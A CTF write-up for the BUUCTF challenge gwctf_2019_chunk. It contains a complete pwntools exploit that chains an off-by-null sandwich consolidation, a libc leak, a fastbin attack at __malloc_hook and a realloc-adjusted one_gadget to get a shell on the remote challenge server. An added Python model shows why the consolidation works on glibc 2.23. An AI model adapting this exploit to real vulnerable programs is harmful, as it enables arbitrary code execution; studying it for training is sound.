(BUUCTF)gwctf_2019_chunk

Prerequisites

  • off-by-null with a sandwich layout, i.e. large-small-large chunks: trigger the off-by-null from the small chunk while also writing the second large chunk's prev_size, so that the three chunks consolidate into one; then allocate the first large chunk back, at which point the unsorted bin pointers get written into the small chunk and leak libc; allocate the small chunk back again and you have an overlapping pointer for a fastbin attack
  • fastbin attack using the misaligned 0x7f fake size
  • realloc_hook stack-frame adjustment so that a one_gadget works

Overall approach

Overall it is just using an off-by-null to leak libc and obtain an overlapping pointer; this one is pretty much free points. If you are not familiar with off-by-null exploitation, follow the exp and write it out step by step, and this whole class of template challenges will make sense.

exp

from pwn import *

filename = './gwctf_2019_chunk'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 28044)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

choice_words = 'Your choice: '

menu_add = 1
add_index_words = 'Give me a book ID: '
add_size_words = 'how long: '
add_content_words = ''

menu_del = 3
del_index_words = 'Which one to throw?\n'

menu_show = 2
show_index_words = 'Which book do you want to show?'

menu_edit = 4
edit_index_words = 'Which book to write?'
edit_size_words = ''
edit_content_words = 'Content: '

def add(index=-1, size=-1, content=''):
    sh.sendlineafter(choice_words, str(menu_add))
    if add_index_words:
        sh.sendlineafter(add_index_words, str(index))
    if add_size_words:
        sh.sendlineafter(add_size_words, str(size))
    if add_content_words:
        sh.sendafter(add_content_words, content)

def delete(index=-1):
    sh.sendlineafter(choice_words, str(menu_del))
    if del_index_words:
        sh.sendlineafter(del_index_words, str(index))

def show(index=-1):
    sh.sendlineafter(choice_words, str(menu_show))
    if show_index_words:
        sh.sendlineafter(show_index_words, str(index))

def edit(index=-1, size=-1, content=''):
    sh.sendlineafter(choice_words, str(menu_edit))
    if edit_index_words:
        sh.sendlineafter(edit_index_words, str(index))
    if edit_size_words:
        sh.sendlineafter(edit_size_words, str(size))
    if edit_content_words:
        sh.sendafter(edit_content_words, content)

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)


# Sandwich layout: large (0x100) - small (0x70) - large (0x100), plus a guard
# chunk so that chunk 2 does not merge into top when it is freed
add(index=0, size=0xf0) # 0
add(index=1, size=0x68) # 1
add(index=2, size=0xf0) # 2
add(index=3, size=0x10) # 3
delete(index=0)         # chunk 0 goes to the unsorted bin; chunk 1's prev_size becomes 0x100

# 0x60 bytes of filler reach chunk 2's prev_size field; write 0x170 (chunk 0 + chunk 1) there,
# and the off-by-null then clears the PREV_INUSE bit of chunk 2's size (0x101 -> 0x100)
payload = b'a'*0x60 + p64(0x170)
edit(index=1, content=payload)
delete(index=2)         # backward consolidation: chunks 0, 1 and 2 merge into one 0x270 unsorted chunk
add(index=0, size=0xf0) # 0: carve chunk 0 back out; the remainder's fd/bk now sit inside chunk 1
show(index=1)
libc_leak = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
leak_info('libc_leak', libc_leak)
libc.address = libc_leak - 0x3c4b78   # main_arena + 88 (unsorted bin head) in this libc
leak_info('libc.address', libc.address)

add(index=4, size=0x68) # 4: same memory as chunk 1, now reachable through two indices
delete(index=1)         # chunk 1 goes into the 0x70 fastbin while index 4 still points at it
fake_malloc_chunk = libc.address + 0x3c4aed   # __malloc_hook - 0x23, where the misaligned 0x7f size lives
edit(index=4, content=p64(fake_malloc_chunk) + b'\n')  # overwrite fd of the freed fastbin chunk
add(index=5, size=0x68) # 5
add(index=6, size=0x68) # 6: handed out from the fake chunk in front of __malloc_hook

one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# 0xb bytes of padding reach __realloc_hook, which gets the one_gadget; __malloc_hook gets
# realloc+13 so the pushes in realloc's prologue shift rsp until the gadget's constraint holds
payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 13)
edit(index=6, content=payload + b'\n')

add(index=7, size=0x40) # any malloc now goes through __malloc_hook
sh.interactive()
# debug()
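To see why the sandwich layout consolidates on glibc 2.23 and which later glibc check stops it, here is a small Python model of free()'s backward consolidation replayed over the chunk layout from the exp above. It is an added illustration written for this write-up, not part of the exploit and not glibc source; the heap dictionary, the offsets and the two check flags are constructed for the model, and bins themselves are not modelled.

```python
PREV_INUSE = 1
def chunksize(c): return c["size"] & ~0xF

def request2size(n):
    """Request size to chunk size, rounded the way glibc does (16-aligned, min 0x20)."""
    return max(0x20, (n + 8 + 15) & ~15)

def build_heap(requests):
    """Constructed heap: chunks laid out contiguously from offset 0, all in use."""
    heap, addr = {}, 0
    for n in requests:
        size = request2size(n)
        heap[addr] = {"size": size | PREV_INUSE, "prev_size": 0}
        addr += size
    heap[addr] = {"size": 0x21000 | PREV_INUSE, "prev_size": 0}  # top chunk
    return heap

def free_chunk(heap, addr, unlink_check=False, consolidate_check=False):
    """Free a chunk; return (address, size) of the chunk that ends up free.
    unlink_check = unlink()'s 'corrupted size vs. prev_size' test (glibc 2.26+);
    consolidate_check = the 'while consolidating' test in _int_free (glibc 2.29+).
    Both off is the 2.23 path. Forward merging is left out (chunk 3 stays in use)."""
    p, size = addr, chunksize(heap[addr])
    if not heap[p]["size"] & PREV_INUSE:                 # backward consolidation
        prevsize = heap[p]["prev_size"]
        p -= prevsize                                    # victim = freed chunk 0
        if consolidate_check and chunksize(heap[p]) != prevsize:
            raise RuntimeError("corrupted size vs. prev_size while consolidating")
        nxt = p + chunksize(heap[p])                     # victim's own successor
        if unlink_check and chunksize(heap[p]) != heap[nxt]["prev_size"]:
            raise RuntimeError("corrupted size vs. prev_size")
        size += prevsize
    heap[p + size]["prev_size"] = size                   # successor bookkeeping
    heap[p + size]["size"] &= ~PREV_INUSE
    heap[p]["size"] = size | (heap[p]["size"] & PREV_INUSE)
    return p, size

def sandwich(**checks):
    """Replay the exp: free chunk 0, forge chunk 2 via the off-by-null, free chunk 2."""
    heap = build_heap([0xf0, 0x68, 0xf0, 0x10])          # chunks at 0x0/0x100/0x170/0x270
    free_chunk(heap, 0x0)                                # chunk 1 gets prev_size 0x100
    heap[0x170]["prev_size"] = 0x170                     # the p64(0x170) in the payload
    heap[0x170]["size"] &= ~0xFF                         # off-by-null: 0x101 -> 0x100
    return free_chunk(heap, 0x170, **checks)

def consolidates(**checks):
    try:                                                 # True if chunks 0..2 merge
        return sandwich(**checks) == (0x0, 0x270)
    except RuntimeError:
        return False
```

The unlink-time check passes because chunk 1's prev_size was legitimately set to 0x100 when chunk 0 was freed; only the consolidation check, which compares chunk 0's size against the forged 0x170 read from chunk 2, aborts.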